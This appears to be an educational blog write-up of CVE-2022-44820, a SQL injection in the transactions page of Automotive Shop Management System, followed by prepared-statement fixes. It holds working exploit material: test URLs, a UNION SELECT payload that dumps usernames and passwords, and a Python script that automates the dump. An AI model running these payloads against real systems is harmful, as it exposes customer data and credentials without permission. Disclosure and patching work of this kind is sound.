Automotive Shop Management System v1. is a web application used by many mechanics and auto shops to handle jobs, orders, inventory, and billing. In 2022, a critical vulnerability (CVE-2022-44820) was found in its admin interface. This exploit lets attackers mess with the database via SQL Injection, risking customer data, orders, and the entire application.

In this post, I'll explain what CVE-2022-44820 is, walk through exploiting it, and give you direct code snippets so you can test or patch your own systems. No security jargon—just clear, real-world advice.

Product: Automotive Shop Management System v1.

- Path: /asms/admin/?page=transactions/manage_transaction&id=
- Risk: Full database dump (read/change/delete data), possible remote code execution

By editing the id parameter in the URL, an attacker can inject SQL commands directly into database queries. This means your shop's invoices and client info could be stolen or replaced.

Where’s the Original Info?

- NVD - CVE-2022-44820
- Exploit-DB Advisory: 51410
- GitHub Disclosure

The vulnerable code in manage_transaction.php looks like this

<?php
$id = $_GET['id'];
$query = "SELECT * FROM transactions WHERE id = $id";
$result = mysqli_query($conn, $query);

Notice there is no input sanitization—whatever is in id goes straight to the database. Classic, dangerous SQL injection.

Step-by-Step Exploit

Let’s see how an attacker could exploit this using a browser and Burp Suite or the command line.

Just open a browser and go to

http://[target]/asms/admin/?page=transactions/manage_transaction&id=1

If you see a legit transaction, great. The exploit is about to get real.

Try changing the id parameter like this

http://[target]/asms/admin/?page=transactions/manage_transaction&id=1%20OR%201=1

1 OR 1=1 is always true. If you suddenly see *all* transactions, the app is vulnerable!

3. Extract Sensitive Data

Now, let's get creative and try to extract usernames or passwords. This assumes the users table has a column called username. Use the following injection:

-1 UNION SELECT 1, username, password, 4, 5, 6 FROM users--

Encoded in URL

http://[target]/asms/admin/?page=transactions/manage_transaction&id=-1%20UNION%20SELECT%201,username,password,4,5,6%20FROM%20users--

This injects a second query to dump usernames and passwords (hashed or, in worst cases, plain text).

Note: You may need to adjust the number of columns to match the database table.

Example Python Script (for Automated Exploitation)

import requests

TARGET = "http://[target]/asms/admin/?page=transactions/manage_transaction&id=";
payload = "-1 UNION SELECT 1, username, password, 4, 5, 6 FROM users--"

url = TARGET + requests.utils.quote(payload)
response = requests.get(url)
print(response.text)

1. Use Prepared Statements

Protect queries by using parameters, not string concatenation.

$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM transactions WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();

Make sure id is always an integer.

$id = intval($_GET['id']);

Conclusion

CVE-2022-44820 is a simple, dangerous SQL injection in Automotive Shop Management System v1.. If you’re running this software, check your URLs and apply the patch immediately. A single request with malicious input could expose all your customer data.

- Want to see what’s fixed? Check for an official patch.
- More details: Exploit-DB 51410

Stay safe, patch often, and always validate your input!

*This post is original content written for educational purposes. Please do not use this information to attack systems without permission.*

Timeline

Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/20/2022 07:39:00 UTC